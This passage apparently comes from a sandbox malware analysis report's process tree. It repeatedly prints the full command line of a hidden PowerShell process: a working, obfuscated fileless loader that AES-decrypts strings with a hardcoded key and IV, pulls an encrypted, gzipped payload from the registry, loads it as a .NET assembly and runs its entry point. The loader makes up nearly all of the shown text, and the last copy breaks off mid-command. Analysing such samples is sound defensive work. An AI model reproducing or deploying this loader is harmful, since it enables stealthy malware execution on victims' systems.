'').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        Hide Artifacts: Hidden Window
        
        PID:8892
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        
        PID:7696
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        27⤵
        Hide Artifacts: Hidden Window
        
        PID:9144
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5824).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = 